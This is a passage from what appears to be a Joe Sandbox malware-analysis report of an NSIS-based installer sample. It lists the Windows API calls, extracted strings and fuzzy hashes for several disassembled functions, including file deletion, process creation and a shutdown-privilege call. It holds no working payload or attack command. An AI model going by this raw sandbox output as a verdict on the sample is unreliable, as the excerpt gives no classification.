                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                        • wsprintfW.USER32 ref: 004039D1
                                                        • GetFileAttributesW.KERNEL32(00437800,00441800), ref: 00403A04
                                                        • DeleteFileW.KERNEL32(00437800), ref: 00403A10
                                                        • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 00403A3E
                                                          • Part of subcall function 00406337: MoveFileExW.KERNEL32(?,?,00000005,00405E35,?,00000000,000000F1,?,?,?,?,?), ref: 00406341
                                                        • CopyFileW.KERNEL32(00442800,00437800,00000001,00441800,00000000), ref: 00403A54
                                                          • Part of subcall function 00405B5A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B83
                                                          • Part of subcall function 00405B5A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B90
                                                          • Part of subcall function 004068D4: FindFirstFileW.KERNEL32(?,0042FAB8,0042F270,00405F97,0042F270,0042F270,00000000,0042F270,0042F270, 4ou,?,00441800,00405CA3,?,756F3420,00441800), ref: 004068DF
                                                          • Part of subcall function 004068D4: FindClose.KERNEL32(00000000), ref: 004068EB
                                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AA2
                                                        • ExitProcess.KERNEL32 ref: 00403ABF
                                                        • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AC6
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AE2
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AE9
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AFE
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B21
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B46
                                                        • ExitProcess.KERNEL32 ref: 00403B69
                                                          • Part of subcall function 00405B25: CreateDirectoryW.KERNEL32(?,00000000,00403545,00441800,00441800,00441800,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00405B2B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                        • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                        • API String ID: 1813718867-2779336553
                                                        • Opcode ID: bbfb8ee3b373486c2b96c0f4544b3db19e0e60a46ad8d454647acdf6da7e114b
                                                        • Instruction ID: 854c728f01c0035939758d15b123b9002cb8995d15bf2fdbd915a0a46deb4321
                                                        • Opcode Fuzzy Hash: bbfb8ee3b373486c2b96c0f4544b3db19e0e60a46ad8d454647acdf6da7e114b
                                                        • Instruction Fuzzy Hash: 6DF1F470604301ABD320AF659D05B6B7EE8EB8570AF10483FF581B22D1DB7DDA458B6E
                                                        APIs
                                                        • DeleteFileW.KERNEL32(?,?,756F3420,00441800,0043F000), ref: 00405CAC
                                                        • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,756F3420,00441800,0043F000), ref: 00405CF4
                                                        • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,756F3420,00441800,0043F000), ref: 00405D17
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,756F3420,00441800,0043F000), ref: 00405D1D
                                                        • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,756F3420,00441800,0043F000), ref: 00405D2D
                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DCD
                                                        • FindClose.KERNEL32(00000000), ref: 00405DDC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: \*.*$pB
                                                        • API String ID: 2035342205-1006940126
                                                        • Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                        • Instruction ID: 26a84cf893ecfac7fe2d2a8ab9ced37764d13583991ceadb599b2dfedf858990
                                                        • Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
                                                        • Instruction Fuzzy Hash: 8E41B030800A18B6CB21AB65DC4DAAF7778EF42718F10813BF851711D1DB7C4A82DEAE
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405799
                                                        • GetDlgItem.USER32(?,000003EE), ref: 004057A8
                                                        • GetClientRect.USER32(?,?), ref: 004057E5
                                                        • GetSystemMetrics.USER32(00000002), ref: 004057EC
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040580D
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040581E
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405831
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040583F
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405852
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405874
                                                        • ShowWindow.USER32(?,00000008), ref: 00405888
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058A9
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004058B9
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058D2
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058DE
                                                        • GetDlgItem.USER32(?,000003F8), ref: 004057B7
                                                          • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004058FB
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000056CF,00000000), ref: 00405909
                                                        • CloseHandle.KERNEL32(00000000), ref: 00405910
                                                        • ShowWindow.USER32(00000000), ref: 00405934
                                                        • ShowWindow.USER32(?,00000008), ref: 00405939
                                                        • ShowWindow.USER32(00000008), ref: 00405983
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004059B7
                                                        • CreatePopupMenu.USER32 ref: 004059C8
                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059DC
                                                        • GetWindowRect.USER32(?,?), ref: 004059FC
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405A15
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4D
                                                        • OpenClipboard.USER32(00000000), ref: 00405A5D
                                                        • EmptyClipboard.USER32 ref: 00405A63
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A6F
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405A79
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A8D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405AAD
                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405AB8
                                                        • CloseClipboard.USER32 ref: 00405ABE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: {
                                                        • API String ID: 590372296-366298937
                                                        • Opcode ID: dfead9bfc37cf3db2b35e915a87c725964709008a4f247d6999fb4be6a1ac7a0
                                                        • Instruction ID: d3b07f9c2581fb6b60ef1a2666babd9f8dcdaaa8066b0d43d813b8afd8e95190
                                                        • Opcode Fuzzy Hash: dfead9bfc37cf3db2b35e915a87c725964709008a4f247d6999fb4be6a1ac7a0
                                                        • Instruction Fuzzy Hash: 03B159B0900608FFDF11AF60DD89AAE7B79FB48355F00813AFA45BA1A0C7785A51DF58
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F7B
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404F86
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FD0
                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FE7
                                                        • SetWindowLongW.USER32(?,000000FC,00405570), ref: 00405000
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00405014
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405026
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040503C
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405048
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040505A
                                                        • DeleteObject.GDI32(00000000), ref: 0040505D
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405088
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405094
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040512F
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040515F
                                                          • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405173
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004051A1
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004051AF
                                                        • ShowWindow.USER32(?,00000005), ref: 004051BF
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 004052BA
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040531F
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405334
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405358
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405378
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040538D
                                                        • GlobalFree.KERNEL32(?), ref: 0040539D
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405416
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004054BF
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054CE
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054F9
                                                        • ShowWindow.USER32(?,00000000), ref: 00405547
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405552
                                                        • ShowWindow.USER32(00000000), ref: 00405559
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                        • Instruction ID: 2b71226c2ce540754c325362a134889399d6c5c4637dca841463e5b600fa6882
                                                        • Opcode Fuzzy Hash: 90cd5b96e7067808b838d0f88060242d92195fc86ed4621a895529849429e476
                                                        • Instruction Fuzzy Hash: 8802AD70900608AFDF20DFA8DD85AAF7BB5FB45314F10817AE611BA2E1D7798A41CF58
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404033
                                                        • ShowWindow.USER32(?), ref: 00404053
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404065
                                                        • ShowWindow.USER32(?,00000004), ref: 0040407E
                                                        • DestroyWindow.USER32 ref: 00404092
                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 004040AB
                                                        • GetDlgItem.USER32(?,?), ref: 004040CA
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040DE
                                                        • IsWindowEnabled.USER32(00000000), ref: 004040E5
                                                        • GetDlgItem.USER32(?,00000001), ref: 00404190
                                                        • GetDlgItem.USER32(?,00000002), ref: 0040419A
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 004041B4
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404205
                                                        • GetDlgItem.USER32(?,00000003), ref: 004042AB
                                                        • ShowWindow.USER32(00000000,?), ref: 004042CC
                                                        • EnableWindow.USER32(?,?), ref: 004042DE
                                                        • EnableWindow.USER32(?,?), ref: 004042F9
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040430F
                                                        • EnableMenuItem.USER32(00000000), ref: 00404316
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040432E
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404341
                                                        • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040436B
                                                        • SetWindowTextW.USER32(?,0042CA68), ref: 0040437F
                                                        • ShowWindow.USER32(?,0000000A), ref: 004044B3
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                        • String ID:
                                                        APIs
                                                          • Part of subcall function 0040696B: GetModuleHandleA.KERNEL32(?,00000020,?,00403662,0000000C,?,?,?,?,?,?,?,?), ref: 0040697D
                                                          • Part of subcall function 0040696B: GetProcAddress.KERNEL32(00000000,?), ref: 00406998
                                                        • lstrcatW.KERNEL32(00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,756F3420,00441800,00000000,0043F000,00008001), ref: 00403CCA
                                                        • lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,756F3420), ref: 00403D4A
                                                        • lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D5D
                                                        • GetFileAttributesW.KERNEL32(004326A0), ref: 00403D68
                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403DB1
                                                          • Part of subcall function 004064BE: wsprintfW.USER32 ref: 004064CB
                                                        • RegisterClassW.USER32(004336A0), ref: 00403DEE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403E06
                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E3B
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E71
                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E9D
                                                        • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403EAA
                                                        • RegisterClassW.USER32(004336A0), ref: 00403EB3
                                                        • DialogBoxParamW.USER32(?,00000000,00403FF7,00000000), ref: 00403ED2
                                                        Strings
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404753
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404767
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404784
                                                        • GetSysColor.USER32(?), ref: 00404795
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004047A3
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004047B1
                                                        • lstrlenW.KERNEL32(?), ref: 004047B6
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047C3
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047D8
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404831
                                                        • SendMessageW.USER32(00000000), ref: 00404838
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404863
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004048A6
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004048B4
                                                        • SetCursor.USER32(00000000), ref: 004048B7
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004048D0
                                                        • SetCursor.USER32(00000000), ref: 004048D3
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404902
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404914
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: ,F@$N
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406358,?,?), ref: 004061F8
                                                        • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 00406201
                                                          • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                          • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 0040621E
                                                        • wsprintfA.USER32 ref: 0040623C
                                                        • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406277
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406286
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004062BE
                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406314
                                                        • GlobalFree.KERNEL32(00000000), ref: 00406325
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040632C
                                                          • Part of subcall function 00406067: GetFileAttributesW.KERNEL32(00000003,004030E2,00442800,80000000,00000003), ref: 0040606B
                                                          • Part of subcall function 00406067: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        Strings
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$[Rename]
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404A36
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A60
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404B11
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404B1C
                                                        • lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B4E
                                                        • lstrcatW.KERNEL32(?,004326A0), ref: 00404B5A
                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B6C
                                                          • Part of subcall function 00405BBB: GetDlgItemTextW.USER32(?,?,00000400,00404BA3), ref: 00405BCE
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                          • Part of subcall function 00406825: CharNextW.USER32(?,0043F000,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                          • Part of subcall function 00406825: CharPrevW.USER32(?,?,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                        • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C2F
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C4A
                                                          • Part of subcall function 00404DA3: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                          • Part of subcall function 00404DA3: wsprintfW.USER32 ref: 00404E4D
                                                          • Part of subcall function 00404DA3: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                        Strings
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004030B3
                                                        • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030CF
                                                          • Part of subcall function 00406067: GetFileAttributesW.KERNEL32(00000003,004030E2,00442800,80000000,00000003), ref: 0040606B
                                                          • Part of subcall function 00406067: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 0040311B
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00403251
                                                        Strings
                                                        • Null, xrefs: 00403199
                                                        • Error launching installer, xrefs: 004030F2
                                                        • Inst, xrefs: 00403187
                                                        • soft, xrefs: 00403190
                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066D6
                                                        • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,756F23A0), ref: 004066EC
                                                        • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040674A
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406753
                                                        • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,?,756F23A0), ref: 0040677E
                                                        • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,756F23A0), ref: 004067D8
                                                        Strings
                                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 004066A7
                                                        • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406778
                                                        Similarity
                                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: *B$ A$ A$... %d%%
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040457A
                                                        • GetSysColor.USER32(00000000), ref: 004045B8
                                                        • SetTextColor.GDI32(?,00000000), ref: 004045C4
                                                        • SetBkMode.GDI32(?,?), ref: 004045D0
                                                        • GetSysColor.USER32(?), ref: 004045E3
                                                        • SetBkColor.GDI32(?,?), ref: 004045F3
                                                        • DeleteObject.GDI32(?), ref: 0040460D
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404617
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        APIs
                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                          • Part of subcall function 00406148: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040615E
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                        Strings
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9
                                                        APIs
                                                        • lstrlenW.KERNEL32(0042BA48,00000000,?,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                        • lstrlenW.KERNEL32(0040343D,0042BA48,00000000,?,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                        • lstrcatW.KERNEL32(0042BA48,0040343D,0040343D,0042BA48,00000000,?,756F23A0), ref: 00405657
                                                        • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405669
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
